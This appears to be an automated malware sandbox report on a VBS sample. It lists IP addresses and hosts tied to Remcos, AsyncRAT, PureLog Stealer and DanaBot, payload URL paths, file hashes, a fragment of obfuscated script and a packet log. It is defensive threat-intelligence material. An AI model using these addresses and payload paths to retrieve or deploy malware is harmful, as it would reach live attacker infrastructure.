                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
23:30:38 | API Interceptor | 46x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.168.32.148 | Shipping Documents.xls | malicious | Remcos | 104.168.32.148/610/RGBVV.txt
104.168.32.148 | C6DAEyTs7d.rtf | malicious | Remcos | 104.168.32.148/550/RWEER.txt
104.168.32.148 | PO.xls | malicious | Remcos | 104.168.32.148/550/RWEER.txt
104.168.32.148 | LJ1IZDkHyE.hta | malicious | Cobalt Strike, Remcos, PureLog Stealer | 104.168.32.148/345/CHPPZA.txt
104.168.32.148 | BL.xls | malicious | Remcos, PureLog Stealer | 104.168.32.148/345/CHPPZA.txt
207.241.227.240 | 1iH5ABLKIA.vbs | malicious | AsyncRAT, DcRat, PureLog Stealer | -
207.241.227.240 | aK7smea2Vv.vbs | malicious | PureLog Stealer | -
207.241.227.240 | vr65co3Boo.vbs | malicious | AsyncRAT, DcRat, PureLog Stealer | -
207.241.227.240 | f4576JaIo9.vbs | malicious | PureLog Stealer | -
207.241.227.240 | 89SkYNNpdi.vbs | malicious | AveMaria, PrivateLoader, PureLog Stealer | -
207.241.227.240 | qiEmGNhUij.vbs | malicious | AsyncRAT, DcRat, PureLog Stealer | -
207.241.227.240 | ZJbugHcHda.vbs | malicious | PureLog Stealer | -
207.241.227.240 | 0BO4n723Q8.vbs | malicious | PureLog Stealer | -
207.241.227.240 | PofaABvatI.vbs | malicious | AgentTesla, PureLog Stealer | -
207.241.227.240 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.29427.26024.rtf | malicious | PureLog Stealer | -
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ia600100.us.archive.org | aK7smea2Vv.vbs | malicious | PureLog Stealer | 207.241.227.240
ia600100.us.archive.org | vr65co3Boo.vbs | malicious | AsyncRAT, DcRat, PureLog Stealer | 207.241.227.240
ia600100.us.archive.org | f4576JaIo9.vbs | malicious | PureLog Stealer | 207.241.227.240
ia600100.us.archive.org | 89SkYNNpdi.vbs | malicious | AveMaria, PrivateLoader, PureLog Stealer | 207.241.227.240
ia600100.us.archive.org | qiEmGNhUij.vbs | malicious | AsyncRAT, DcRat, PureLog Stealer | 207.241.227.240
ia600100.us.archive.org | ZJbugHcHda.vbs | malicious | PureLog Stealer | 207.241.227.240
ia600100.us.archive.org | 0BO4n723Q8.vbs | malicious | PureLog Stealer | 207.241.227.240
ia600100.us.archive.org | PofaABvatI.vbs | malicious | AgentTesla, PureLog Stealer | 207.241.227.240
ia600100.us.archive.org | SecuriteInfo.com.Exploit.CVE-2017-11882.123.29427.26024.rtf | malicious | PureLog Stealer | 207.241.227.240
ia600100.us.archive.org | RFQ 2024.09.26-89 vivecta.vbs | malicious | PureLog Stealer | 207.241.227.240
Match | Associated Sample Name / URL | Detection | Threat Name | Context
INTERNET-ARCHIVEUS | 1iH5ABLKIA.vbs | malicious | AsyncRAT, DcRat, PureLog Stealer | 207.241.227.240
INTERNET-ARCHIVEUS | aK7smea2Vv.vbs | malicious | PureLog Stealer | 207.241.227.240
INTERNET-ARCHIVEUS | vr65co3Boo.vbs | malicious | AsyncRAT, DcRat, PureLog Stealer | 207.241.227.240
INTERNET-ARCHIVEUS | f4576JaIo9.vbs | malicious | PureLog Stealer | 207.241.227.240
INTERNET-ARCHIVEUS | 89SkYNNpdi.vbs | malicious | AveMaria, PrivateLoader, PureLog Stealer | 207.241.227.240
INTERNET-ARCHIVEUS | qiEmGNhUij.vbs | malicious | AsyncRAT, DcRat, PureLog Stealer | 207.241.227.240
INTERNET-ARCHIVEUS | ZJbugHcHda.vbs | malicious | PureLog Stealer | 207.241.227.240
INTERNET-ARCHIVEUS | 0BO4n723Q8.vbs | malicious | PureLog Stealer | 207.241.227.240
INTERNET-ARCHIVEUS | PofaABvatI.vbs | malicious | AgentTesla, PureLog Stealer | 207.241.227.240
INTERNET-ARCHIVEUS | SecuriteInfo.com.Exploit.CVE-2017-11882.123.29427.26024.rtf | malicious | PureLog Stealer | 207.241.227.240
AS-COLOCROSSINGUS | uLfuBVyZFV.vbs | malicious | Unknown | 198.46.129.134
AS-COLOCROSSINGUS | 2THp7fwNQD.vbs | malicious | Unknown | 107.172.130.147
AS-COLOCROSSINGUS | 0BO4n723Q8.vbs | malicious | PureLog Stealer | 107.172.148.248
AS-COLOCROSSINGUS | CEjWMdiJnR.exe | malicious | DanaBot | 23.95.182.47
AS-COLOCROSSINGUS | 8CRB0iJuy1.dll | malicious | DanaBot | 23.95.182.47
AS-COLOCROSSINGUS | CEjWMdiJnR.exe | malicious | DanaBot | 23.95.182.47
AS-COLOCROSSINGUS | 8CRB0iJuy1.dll | malicious | DanaBot | 23.95.182.47
AS-COLOCROSSINGUS | CANADAXORDER.xls | malicious | Snake Keylogger | 172.245.123.6
AS-COLOCROSSINGUS | Shipping Documents.xls | malicious | Remcos | 104.168.32.148
AS-COLOCROSSINGUS | SecuriteInfo.com.Exploit.CVE-2017-11882.123.28227.30541.rtf | malicious | Remcos | 104.168.7.8
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | 1iH5ABLKIA.vbs | malicious | AsyncRAT, DcRat, PureLog Stealer | 207.241.227.240
3b5074b1b5d032e5620f69f9f700ff0e | uLfuBVyZFV.vbs | malicious | Unknown | 207.241.227.240
3b5074b1b5d032e5620f69f9f700ff0e | aK7smea2Vv.vbs | malicious | PureLog Stealer | 207.241.227.240
3b5074b1b5d032e5620f69f9f700ff0e | vr65co3Boo.vbs | malicious | AsyncRAT, DcRat, PureLog Stealer | 207.241.227.240
3b5074b1b5d032e5620f69f9f700ff0e | f4576JaIo9.vbs | malicious | PureLog Stealer | 207.241.227.240
3b5074b1b5d032e5620f69f9f700ff0e | WW8kzvnphl.vbs | malicious | Unknown | 207.241.227.240
3b5074b1b5d032e5620f69f9f700ff0e | 89SkYNNpdi.vbs | malicious | AveMaria, PrivateLoader, PureLog Stealer | 207.241.227.240
3b5074b1b5d032e5620f69f9f700ff0e | qiEmGNhUij.vbs | malicious | AsyncRAT, DcRat, PureLog Stealer | 207.241.227.240
3b5074b1b5d032e5620f69f9f700ff0e | 2THp7fwNQD.vbs | malicious | Unknown | 207.241.227.240
3b5074b1b5d032e5620f69f9f700ff0e | iJEK0xwucj.vbs | malicious | Unknown | 207.241.227.240
                                                          No context
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):64
                                                          Entropy (8bit):1.1940658735648508
                                                          Encrypted:false
                                                          SSDEEP:3:Nlllulv4iZ:NllUg
                                                          MD5:70F8065256CFB7FD75CA2A8F72BA3FA4
                                                          SHA1:5A09385998FD735B5E5BD54F5901F3B180363A57
                                                          SHA-256:F5DCDC55A3BF26D5E74BE7BA34D146984239C1CF7859C598B2B5A7C1A912755B
                                                          SHA-512:CE4EEEC66F3553833690F46A08D17D9165D733753A2629998961A19EE57B94CF78961B1C3A0364434A943FF6DC964C5D15233224E8CC4E62507EA792313CC5D4
                                                          Malicious:false
                                                          Reputation:moderate, very likely benign file
                                                          Preview:@...e.................................~..............@..........
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:high, very likely benign file
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:high, very likely benign file
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          File type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Entropy (8bit):3.765032305777867
                                                          TrID:
                                                          • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                                          • MP3 audio (1001/1) 32.22%
                                                          • Lumena CEL bitmap (63/63) 2.03%
                                                          • Corel Photo Paint (41/41) 1.32%
                                                          File name:kz1fEn2R9Z.vbs
                                                          File size:260'242 bytes
                                                          MD5:10a145cb87654a33c6c0beda947466b8
                                                          SHA1:a504192f1b5ac44e6e49b4bc9ef660220c604469
                                                          SHA256:80e7c85eeb0a57e9f50e7d84e0eb1b2f2230837b53080d24696fab7373e9bc03
                                                          SHA512:fbc4f71668b7af09338ae7060c04dd8feed091b3b7adb490647c92d731cefca4b1e929d36f750563ff0afa14b797984625eaf964f25a3f71b597343d79ec891a
                                                          SSDEEP:3072:LwUs2qx9vFgTOuYTLaGHcntHONrLgt5psGwH7Hkyb9qGjK6Heo7sQ5CoBAlbjZft:MUgvFgTfYiGHs2/2Gj+ULIoSVZ+zO
                                                          TLSH:BE44080225EA7008F1F32F525AF955F94F6BB9652939922D648C1B0F1BE3E80CD51BB3
                                                          File Content Preview:..........f.G.U.W.L.a.C.k.k.R.k.W.c.W.a.l.K.J.z.c.K.L.t.L.z. .=. .".d.T.b.A.p.U.N.c.K.A.p.S.K.L.f.U.H.z.K.b.f.c.o.U.l.".....L.P.B.n.c.L.i.u.e.G.e.k.q.T.c.a.n.t.i.s.s.o.c.i.a.l.i.s.t.a.L.P.p.O.B.P.h.e. .=. .".K.z.l.A.Q.S.K.q.Z.m.e.L.p.t.a.c.a.e.e.A.W.u.o.o
                                                          Icon Hash:68d69b8f86ab9a86
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 2, 2024 05:30:39.411379099 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:39.411443949 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:39.411545038 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:39.421103001 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:39.421123981 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.016565084 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.016834021 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.020977974 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.021013975 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.021392107 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.060187101 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.103420019 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.306261063 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.306287050 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.306293964 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.306338072 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.306360006 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.306385994 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.306435108 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.306452990 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.306487083 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.325750113 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.325778008 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.325860977 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.325886011 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.325927973 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.374174118 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.374200106 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.374254942 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.374303102 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.374321938 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.374342918 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.411895037 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.411922932 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.412080050 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.412126064 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.412173033 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.442137957 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.442164898 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.442373991 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.442413092 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.442470074 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.443139076 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.443156958 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.443226099 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.443234921 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.443276882 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.509804010 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.509829998 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.509979963 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.510020971 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.510107040 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.510988951 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.511007071 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.511085987 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.511104107 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.511149883 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.577411890 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.577442884 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.577549934 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.577580929 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.577686071 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.578536034 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.578561068 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.578648090 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.578670025 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.578727007 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.645669937 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.645703077 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.645941973 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.645977974 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.646028996 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.646563053 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.646600008 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.646667004 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.646673918 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.646716118 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.647717953 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.647737980 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.647830009 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.647838116 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.647924900 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.713994026 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.714020014 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.714293003 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.714323997 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.714464903 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.715135098 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.715156078 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.715209961 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.715218067 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.715265989 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.781578064 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.781601906 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.781757116 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.781780958 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.781826019 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.782742023 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.782757998 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.782809973 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.782816887 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.782857895 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.783639908 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.783655882 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.783727884 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.783735991 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.783775091 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.850035906 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.850060940 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.850188971 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.850209951 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.850248098 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.851094961 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.851110935 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.851161003 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.851171970 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.851211071 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.917366982 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.917398930 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.917474985 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.917512894 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.917557955 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.918159008 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.918180943 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.918234110 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.918241978 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.918284893 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.919410944 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.919428110 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.919482946 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.919490099 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.919528961 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.995750904 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.995776892 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.995897055 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.995922089 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.995969057 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.996762037 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.996777058 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.996836901 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.996845007 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.996877909 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.997981071 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.997997046 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.998050928 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:40.998056889 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:40.998095989 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:41.055304050 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:41.055332899 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:41.055502892 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:41.055516005 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:41.055558920 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:41.056657076 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:41.056674004 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:41.056720972 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:41.056729078 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:41.056766987 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:41.057591915 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:41.057606936 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:41.057666063 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:41.057672977 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:41.057710886 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:41.123245001 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:41.123274088 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:41.123367071 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:41.123375893 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
